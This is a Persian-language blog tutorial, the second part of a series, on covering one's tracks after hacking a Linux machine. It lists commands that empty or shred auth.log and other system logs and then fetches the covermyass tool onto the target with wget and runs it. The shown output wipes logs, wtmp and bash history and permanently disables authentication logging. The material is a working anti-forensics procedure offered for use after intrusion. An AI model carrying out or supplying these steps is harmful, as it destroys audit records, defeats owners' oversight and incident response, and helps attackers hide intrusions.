پاک کردن لاگ برای پاک کردن ردپا در لینوکس موقع هک کردن سیستم

پاک کردن لاگ برای پاک کردن ردپا در لینوکس موقع هک کردن سیستم (۲)

بدون ديدگاه

سلام خدمت تمامی شما کاربران تیم امنیتی بیت، در قسمت دوم از آموزش پاک کردن ردپا در لینوکس با هم دیگه هستیم

و توی این قسمت از آموزش میبینیم که دیگه چه مراحلی باید طی بشه

در قسمت قبلی راجب ساخت دایرکتوری مخفی و پاک کردن تاریخچه bash صحبت کردیم

در این قسمت میخوایم راجب Log File ها صحبت کنیم

۱- پاک کردن Log File ها

علاوه بر تاریخچه bash، فایل های لاگ نیز باید برای پاک کردن ردپا در لینوکس حذف شوند

تا بتوانید بعد از انجام تست نفوذ و هک رد های خودتون رو از بین ببرید

Common Log Files

در زیر ۴ مورد از Log File هارو با هم بررسی میکنیم و میبینیم که چه چیزی را در خودشان دارند

/var/log/auth.log ==> Authentication
/var/log/cron.log ==> Cron Jobs
/var/log/maillog ==> Mail
/var/log/httpd ==> Apache

در لیست بالا با “==>” مشخص شده است که هر مسیر و فایل مرتبط با چه نوع Log File ای هست

اما راجب Cron job یک توضیح مختصر بهتون میدم

Cron Job ها یک قابلیت در لینوکس است که به کمک آن میتوان یک دستور خاص را در یک بازه زمانی خاص اجرا کرد

و یا در بازه های زمانی مشخص یک Script و یا دستور اجرا شود

حالا ما به سادگی میتوانیم به کمک دستور rm این فایل های لاگ را حذف کنیم

[email protected]:/# rm /var/log/auth.log

اما مسیر بالا و حذف کردن آن خودش ماهیت امنیتی دارد و پاک کردن کلی آن توصیه نمیشود

به جای آن بهتر است تا محتوی فایل را خالی کنیم تا چیزی داخل آن باقی نماند

اینکار به کمک دستور زیر امکان پذیر است

[email protected]:/# truncate -s 0 /var/log/auth.log

اما توجه داشته باشید که دستور truncate در تمامی سیستم ها موجود نیست

به همین دلیل میتوانیم همین کار را به کمک echo کردن یک string خالی در فایل لاگ انجام داد

که به کمک دستور زیر انجام میشود

[email protected]:/# echo '' > /var/log/auth.log

و یا به کمک دستور زیر:

[email protected]:/# > /var/log/auth.log

همچنین میتوانیم آن را به /dev/null ارسال کنیم (به هیچ جا):

[email protected]:/# cat /dev/null > /var/log/auth.log

و یا استفاده از دستور tee:

[email protected]:/# true | tee /var/log/auth.log

همچنین میتوانیم از دستور dd استفاده کنیم تا یک چیز خالی را در داخل log file جایگزین کنیم

[email protected]:/# dd if=/dev/null of=/var/log/auth.log

۰+۰ records in
۰+۰ records out
۰ bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

همچنین میتوانیم به کمک دستور shred اطلاعات فایل را با داده های بی معنی binary جایگزین کنیم

[email protected]:/# shred /var/log/auth.log

همچنین برای اینکه زمانی که از دستور shred استفاده میکنیم و نمیخواهیم آثاری از استفاده از خود shred هم موجود باشد

از سوییچ -zu استفاده میکنیم

[email protected]:/# shred -zu /var/log/auth.log

۲- استفاده از ابزار covermyass

برای بالا بردن شانس اینکه تمامی فعالیت های ما پنهان است و اطمینان از اینکه پاک کردن ردپا در لینوکس انجام شده است

میتوانیم از ابزار covermyass استفاده کنیم که تمامی مراحل را به طور خودکار برای ما انجام میدهد

برای اینکار اول از همه بر روی ماشین موردنظر مخزن ابزار موردنظر را از github به کمک دستور wget دریافت میکنیم

  • که البته در صورتی که تارگت ما به اینترنت دسترسی دارد
[email protected]:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

و سپس وارد دایرکتوری ابزار میشویم و به آن دسترسی اجرایی میدهیم

[email protected]:/tmp# chmod +x covermyass

و بعد به سادگی میتوانیم ابزار را اجرا کنیم

[email protected]:/tmp# ./covermyass

Welcome to Cover my ass tool !

Select an option :

۱) Clear logs for user root
۲) Permenently disable auth & bash history
۳) Restore settings to default
۹۹) Exit tool

>

که همانطور که میبینید به ما چندین انتخاب برای پاک کردن ردپا در لینوکس میدهد

به طور مثال گزینه اول را برای پاک کردن Log file ها انتخاب میکنیم

> 1

[+] /var/log/messages cleaned.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

همچنین میتوانیم به کمک گزینه ۲ تاریخچه bash را هم غیرفعال کنیم

> 2

[+] Permanently sending /var/log/auth.log to /dev/null
[+] Permanently sending bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Disabled history library

Permenently disabled bash log.

و در صورتی که نیاز داشته باشید به صورت خیلی فوری و عجله ای این ابزار تمامی لاگ هارا برایتان پاک کند

میتوانید به شکل زیر از ابزار استفاده کنید تا خود ابزار به طور خودکار تمامی موارد را برایتان انجام دهد

[email protected]:/tmp# ./covermyass now

[+] /var/log/messages cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

موفق باشید

نوشتن دیدگاه